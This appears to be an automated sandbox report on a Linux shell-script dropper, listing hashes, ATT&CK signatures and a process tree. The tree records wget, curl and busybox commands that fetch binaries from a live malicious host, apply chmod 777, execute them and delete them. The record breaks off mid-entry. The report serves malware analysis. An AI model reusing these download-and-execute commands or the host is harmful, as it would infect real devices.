Analysis
-
max time kernel
127s -
max time network
126s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
18/10/2024, 02:15
Static task
static1
Behavioral task
behavioral1
Sample
9594f3c1ad6267033e4bcb8ea02755d90c1bcf14d410539cc5233314763084f4.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
9594f3c1ad6267033e4bcb8ea02755d90c1bcf14d410539cc5233314763084f4.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
9594f3c1ad6267033e4bcb8ea02755d90c1bcf14d410539cc5233314763084f4.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
9594f3c1ad6267033e4bcb8ea02755d90c1bcf14d410539cc5233314763084f4.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
9594f3c1ad6267033e4bcb8ea02755d90c1bcf14d410539cc5233314763084f4.sh
-
Size
10KB
-
MD5
62c3af5d98480e4bfccd186de98627f5
-
SHA1
b814830f919dbd09114e657b1657554d719d9fb7
-
SHA256
9594f3c1ad6267033e4bcb8ea02755d90c1bcf14d410539cc5233314763084f4
-
SHA512
32736f2421c49416705f2f773c0a659184e55a3fb4c329ad0a008b34fc43b59ec7d1100fac4fb4674776e5e02e46cf7729e29bb6491e99ba220e53df38489bf2
-
SSDEEP
192:G5B87XQQiZG/rqpxwZWOzkUZ/rqpxt5B87XSWkUzN:yQccZV9
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 915 chmod 950 chmod 964 chmod 971 chmod 805 chmod 856 chmod 866 chmod 908 chmod 901 chmod 943 chmod 957 chmod 999 chmod 985 chmod 849 chmod 887 chmod 929 chmod 978 chmod 873 chmod 992 chmod 936 chmod 922 chmod 1016 chmod 1030 chmod 880 chmod 894 chmod 1023 chmod 820 chmod 1006 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq 806 oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq /tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 821 TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 /tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K 850 yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K /tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg 857 l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg /tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 867 CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 /tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z 874 ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z /tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq 881 pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq /tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 888 X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 /tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV 895 wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV /tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL 902 vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL /tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 909 ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 /tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD 916 suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD /tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA 923 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA /tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW 930 CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW /tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq 937 oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq /tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z 944 ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z /tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 951 TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 /tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K 958 yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K /tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg 965 l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg /tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 972 CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 /tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV 979 wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV /tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq 986 pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq /tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 993 X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 /tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW 1000 CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW /tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL 1007 vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL /tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 1017 ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 /tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD 1024 suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD /tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA 1031 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 919 curl 946 wget 1005 busybox 932 wget 933 curl 949 busybox 953 wget 961 curl 968 curl 984 busybox 926 curl 940 curl 863 curl 974 wget 977 busybox 1020 curl 848 busybox 853 curl 998 busybox 921 busybox 991 busybox 947 curl 954 curl 1026 wget 870 curl 897 wget 876 wget 967 wget 900 busybox 928 busybox 975 curl 981 wget 1029 busybox 786 busybox 884 curl 827 wget 891 curl 918 wget 939 wget 942 busybox 777 curl 809 curl 963 busybox 855 busybox 893 busybox 988 wget 808 wget 914 busybox 890 wget 970 busybox 996 curl 859 wget 865 busybox 935 busybox 960 wget 989 curl 995 wget 1002 wget 1022 busybox 852 wget 925 wget 1027 curl 982 curl 1019 wget -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K curl File opened for modification /tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 curl File opened for modification /tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg curl File opened for modification /tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV curl File opened for modification /tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA curl File opened for modification /tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL curl File opened for modification /tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 curl File opened for modification /tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z curl File opened for modification /tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 curl File opened for modification /tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA curl File opened for modification /tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW curl File opened for modification /tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 curl File opened for modification /tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 curl File opened for modification /tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD curl File opened for modification /tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL curl File opened for modification /tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq curl File opened for modification /tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV curl File opened for modification /tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq curl File opened for modification /tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 curl File opened for modification /tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq curl File opened for modification /tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD curl File opened for modification /tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq curl File opened for modification /tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z curl File opened for modification /tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW curl File opened for modification /tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg curl File opened for modification /tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K curl File opened for modification /tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 curl File opened for modification /tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 curl
Processes
-
/tmp/9594f3c1ad6267033e4bcb8ea02755d90c1bcf14d410539cc5233314763084f4.sh/tmp/9594f3c1ad6267033e4bcb8ea02755d90c1bcf14d410539cc5233314763084f4.sh1⤵PID:728
-
/bin/rm/bin/rm bins.sh2⤵PID:730
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵PID:735
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:777
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- System Network Configuration Discovery
PID:786
-
-
/bin/chmodchmod 777 oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- File and Directory Permissions Modification
PID:805
-
-
/tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq./oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- Executes dropped EXE
PID:806
-
-
/bin/rmrm oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵PID:807
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- System Network Configuration Discovery
PID:808
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:809
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵PID:815
-
-
/bin/chmodchmod 777 TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5./TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- Executes dropped EXE
PID:821
-
-
/bin/rmrm TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵PID:825
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- System Network Configuration Discovery
PID:827
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:837
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- System Network Configuration Discovery
PID:848
-
-
/bin/chmodchmod 777 yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- File and Directory Permissions Modification
PID:849
-
-
/tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K./yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- Executes dropped EXE
PID:850
-
-
/bin/rmrm yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵PID:851
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- System Network Configuration Discovery
PID:852
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:853
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- System Network Configuration Discovery
PID:855
-
-
/bin/chmodchmod 777 l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- File and Directory Permissions Modification
PID:856
-
-
/tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg./l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- Executes dropped EXE
PID:857
-
-
/bin/rmrm l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵PID:858
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- System Network Configuration Discovery
PID:859
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- System Network Configuration Discovery
PID:865
-
-
/bin/chmodchmod 777 CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9./CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵PID:868
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:869
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:872
-
-
/bin/chmodchmod 777 ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z./ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:875
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- System Network Configuration Discovery
PID:876
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵PID:879
-
-
/bin/chmodchmod 777 pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq./pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵PID:882
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵PID:883
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵PID:886
-
-
/bin/chmodchmod 777 X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4./X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵PID:889
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- System Network Configuration Discovery
PID:890
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- System Network Configuration Discovery
PID:893
-
-
/bin/chmodchmod 777 wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- File and Directory Permissions Modification
PID:894
-
-
/tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV./wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- Executes dropped EXE
PID:895
-
-
/bin/rmrm wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵PID:896
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- System Network Configuration Discovery
PID:897
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:898
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- System Network Configuration Discovery
PID:900
-
-
/bin/chmodchmod 777 vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL./vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵PID:903
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:904
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:907
-
-
/bin/chmodchmod 777 ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0./ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:910
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵PID:911
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- System Network Configuration Discovery
PID:914
-
-
/bin/chmodchmod 777 suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD./suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵PID:917
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- System Network Configuration Discovery
PID:918
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- System Network Configuration Discovery
PID:921
-
-
/bin/chmodchmod 777 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA./3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵PID:924
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- System Network Configuration Discovery
PID:925
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:926
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- System Network Configuration Discovery
PID:928
-
-
/bin/chmodchmod 777 CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW./CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- Executes dropped EXE
PID:930
-
-
/bin/rmrm CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵PID:931
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- System Network Configuration Discovery
PID:932
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- System Network Configuration Discovery
PID:935
-
-
/bin/chmodchmod 777 oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- File and Directory Permissions Modification
PID:936
-
-
/tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq./oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- Executes dropped EXE
PID:937
-
-
/bin/rmrm oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵PID:938
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- System Network Configuration Discovery
PID:939
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:940
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- System Network Configuration Discovery
PID:942
-
-
/bin/chmodchmod 777 ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z./ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:945
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- System Network Configuration Discovery
PID:946
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- System Network Configuration Discovery
PID:949
-
-
/bin/chmodchmod 777 TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5./TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵PID:952
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- System Network Configuration Discovery
PID:953
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:954
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵PID:956
-
-
/bin/chmodchmod 777 yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K./yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵PID:959
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- System Network Configuration Discovery
PID:960
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
